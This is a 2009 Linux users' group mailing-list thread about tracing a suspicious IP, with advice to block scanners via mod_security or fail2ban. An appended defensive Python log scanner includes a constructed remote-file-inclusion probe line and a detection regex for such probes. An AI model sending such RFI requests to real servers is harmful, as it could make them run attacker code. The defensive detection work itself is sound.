[plug] 150.70.84.43

michaelbaker at westnet.com.au
Sun Jan 11 22:35:41 WST 2009


Most likely a script kiddy box or a hacked machine running scripts to search for RFIs which will allow it to execute PHP code on your web server. Google mod_security, that will stop a lot of it, or get something like fail2ban watching the web server logs for 404s and it can firewall the IPs for you.
----- Original Message -----
From: Niffum <bulkniffum at iinet.net.au>
To: plug at plug.org.au
Sent: Sun, 11 Jan 2009 19:01:30 +0900 (WST)
Subject: Re: [plug] 150.70.84.43

I tried nslookup to resolve the IP address; I didn't know about dig -x.

I thought it may be a dodgy host because I would expect that a non-dodgy 
host would have created a reverse lookup that I could just nslookup.

Trend is installed on this PC so that would be why.  I was about to 
add that IP address to my already huge hosts.deny.

At 05:52 PM 11/01/2009, you wrote:

>It seems that the IP address is hosted in Japan.
>
>whois tells me
>whois 150.70.84.43
>inetnum:      150.26.0.0 - 150.100.255.255
>netname:      JAPAN150
>country:      JP
>descr:        Japan Network Information Center
>    <snip>
>role:         Japan Network Information Center
>address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
>address:      Chiyoda-ku, Tokyo 101-0047, Japan
>country:      JP
>    <snip>
>
>and a reverse DNS tells me that trendmicro are using the specific IP.
>
>dig -x 150.70.84.43
>; <<>> DiG 9.3.4-P1 <<>> -x 150.70.84.43
>;; global options:  printcmd
>;; Got answer:
>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26411
>;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
>
>;; QUESTION SECTION:
>;43.84.70.150.in-addr.arpa.     IN      PTR
>
>;; AUTHORITY SECTION:
>70.150.in-addr.arpa.    3600    IN      SOA 
>tmns1.trendmicro.com. dnsadmin.trendmicro.com. 55 60 600 86400 3600
>
>;; Query time: 1058 msec
>;; SERVER: 10.1.1.100#53(10.1.1.100)
>;; WHEN: Sun Jan 11 17:40:17 2009
>;; MSG SIZE  rcvd: 108
>
>
>Not knowing your set up: is it possible you have the trendmicro 
>antivirus software installed and that this is using a remote service 
>to check websites for malicious code or whatever on the website?
>
>My dealings with Trendmicro are that their products are pretty good, 
>so I don't think that it is a dodgy remote host.
>
>good luck
>

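The log-watching approach suggested above (spot RFI probes and runs of 404s in the web server log, then hand the source IPs to a firewall or hosts.deny), as an added example that is not part of the original thread and is not fail2ban's or mod_security's own code. It assumes Apache combined-format access logs, and the sample log lines, the RFC 5737 addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-format log line: we only need client IP, timestamp, request path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Classic remote-file-inclusion probe: a query parameter whose value is a remote URL.
RFI_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (RFC 5737 documentation addresses): one RFI probe, one scanner
# hammering guessed admin paths, and a normal visitor with a single stray 404.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Jan/2009:19:01:30 +0900] "GET /index.php?page=http://203.0.113.5/c.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
203.0.113.9 - - [11/Jan/2009:19:01:45 +0900] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jan/2009:19:02:01 +0900] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Jan/2009:19:02:02 +0900] "GET /pma/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.9 - - [11/Jan/2009:19:02:05 +0900] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jan/2009:19:02:06 +0900] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Jan/2009:19:02:07 +0900] "GET /mysql/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
"""

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def find_offenders(lines, max_404=4, window=timedelta(minutes=10)):
    """Map IP -> reason: any RFI-style request, or >= max_404 404s inside a sliding window."""
    recent_404 = defaultdict(list)   # ip -> timestamps of 404s still inside the window
    offenders = {}
    for line in lines:               # lines are assumed to be in chronological order
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        if RFI_RE.search(path):
            offenders[ip] = "rfi-probe"      # a single probe is enough to flag the host
        elif status == 404:
            recent_404[ip] = [t for t in recent_404[ip] if ts - t <= window] + [ts]
            if len(recent_404[ip]) >= max_404:
                offenders.setdefault(ip, "404-burst")
    return offenders

if __name__ == "__main__":
    # Emit what a firewall or hosts.deny feed would consume; the actual ban is left to the admin.
    for ip, reason in sorted(find_offenders(SAMPLE_LOG.splitlines()).items()):
        print(f"{ip}\t{reason}")
```

The 404 threshold and window are deliberately conservative; a legitimate visitor with a missing favicon is not flagged, while a scanner guessing admin paths is.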
_______________________________________________
PLUG discussion list: plug at plug.org.au
http://www.plug.org.au/mailman/listinfo/plug
Committee e-mail: committee at plug.linux.org.au